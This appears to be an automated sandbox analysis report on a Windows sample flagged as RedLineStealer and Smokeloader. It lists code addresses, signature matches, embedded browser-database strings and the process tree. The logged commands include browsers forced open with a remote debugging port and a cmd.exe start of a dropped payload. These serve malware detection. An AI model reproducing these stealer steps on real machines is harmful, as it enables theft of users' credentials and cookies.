                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C639E300_2_6C639E30
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6256000_2_6C625600
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C617E100_2_6C617E10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6476E30_2_6C6476E3
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DBEF00_2_6C5DBEF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5EFEF00_2_6C5EFEF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C634EA00_2_6C634EA0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5F5E900_2_6C5F5E90
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C63E6800_2_6C63E680
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E9F000_2_6C5E9F00
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6177100_2_6C617710
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C606FF00_2_6C606FF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DDFE00_2_6C5DDFE0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6277A00_2_6C6277A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5F88500_2_6C5F8850
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5FD8500_2_6C5FD850
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C61F0700_2_6C61F070
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C61B8200_2_6C61B820
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6248200_2_6C624820
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E78100_2_6C5E7810
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6158E00_2_6C6158E0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6450C70_2_6C6450C7
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5FC0E00_2_6C5FC0E0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6060A00_2_6C6060A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C62B9700_2_6C62B970
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C64B1700_2_6C64B170
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5FA9400_2_6C5FA940
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5ED9600_2_6C5ED960
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C60D9B00_2_6C60D9B0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6151900_2_6C615190
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6329900_2_6C632990
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DC9A00_2_6C5DC9A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C619A600_2_6C619A60
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C61E2F00_2_6C61E2F0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C618AC00_2_6C618AC0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5F1AF00_2_6C5F1AF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C604AA00_2_6C604AA0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C642AB00_2_6C642AB0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5ECAB00_2_6C5ECAB0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C64BA900_2_6C64BA90
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5D22A00_2_6C5D22A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5D53400_2_6C5D5340
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5EC3700_2_6C5EC370
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C61D3200_2_6C61D320
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C6453C80_2_6C6453C8
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5DF3800_2_6C5DF380
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: String function: 6C6194D0 appears 90 times
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: String function: 00404610 appears 317 times
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: String function: 6C60CBE8 appears 134 times
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 3100
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs hwWxZRwpeL.exe
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611261955.000000006C855000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs hwWxZRwpeL.exe
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIWg vs hwWxZRwpeL.exe
                      Source: hwWxZRwpeL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2589608743.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: hwWxZRwpeL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@68/307@27/24
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C637030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C637030
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JA8A0Q9X.htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3552
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\572f3511-ce38-4d56-8946-8e0fcb526e84.tmpJump to behavior
                      Source: hwWxZRwpeL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2223827267.000000002103B000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000003.2317968678.000000002102F000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000003.2219258222.0000000000819000.00000004.00000020.00020000.00000000.sdmp, BKFCBFCBFBKEBFIDBKEC.0.dr, EGDGIEGHJEGIDGCAFBFC.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2610493469.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: hwWxZRwpeL.exeReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Users\user\Desktop\hwWxZRwpeL.exe "C:\Users\user\Desktop\hwWxZRwpeL.exe"
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 --field-trial-handle=2296,i,13023938482430916518,14835191359952617541,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2280,i,18331130875080231258,16974175982020744534,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7104 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7268 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\ECAFHDBGHJ.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 3100
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\ECAFHDBGHJ.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 --field-trial-handle=2296,i,13023938482430916518,14835191359952617541,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2280,i,18331130875080231258,16974175982020744534,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7104 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7268 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: srvcli.dllJump to behavior
